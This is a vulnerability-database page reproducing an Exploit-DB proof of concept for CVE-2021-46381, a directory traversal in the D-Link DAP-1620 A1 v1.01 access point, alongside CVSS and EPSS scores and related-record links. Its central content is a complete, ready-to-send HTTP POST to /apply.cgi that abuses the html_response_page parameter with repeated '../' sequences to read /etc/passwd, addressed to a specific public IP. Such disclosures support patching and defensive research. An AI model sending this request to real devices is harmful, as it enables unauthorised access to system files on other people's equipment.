Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMomen EldawakhlyEDB-ID:50919
HistoryMay 11, 2022 - 12:00 a.m.

DLINK DAP-1620 A1 v1.01 - Directory Traversal

2022-05-1100:00:00
Momen Eldawakhly
www.exploit-db.com
180

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.026 Low

EPSS

Percentile

90.3%

JSON
# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381

POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive

action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass

Related

nuclei 1
githubexploit 1
cvelist 1
nvd 1
cnvd 1
zdt 1
packetstorm 1
cve 1
prion 1
nuclei
nuclei
D-Link DAP-1620 - Local File Inclusion
2022-03-25 23:48:25
githubexploit
githubexploit
Exploit for Path Traversal in Dlink Dap-1620 Firmware
2022-05-31 10:54:40
cvelist
cvelist
CVE-2021-46381
2022-03-04 15:24:50
nvd
nvd
CVE-2021-46381
2022-03-04 16:15:09
cnvd
cnvd
D-Link DAP-1620 Path Traversal Vulnerability
2022-03-08 00:00:00
zdt
zdt
D-LINK DAP-1620 A1 v1.01 - Directory Traversal Vulnerability
2022-05-12 00:00:00
packetstorm
packetstorm
DLINK DAP-1620 A1 1.01 Directory Traversal
2022-05-11 00:00:00
cve
cve
CVE-2021-46381
2022-03-04 16:15:09
prion
prion
Path traversal
2022-03-04 16:15:00

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.026 Low

EPSS

Percentile

90.3%

JSON
Related for EDB-ID:50919
nuclei1githubexploit1cvelist1nvd1cnvd1zdt1packetstorm1cve1prion1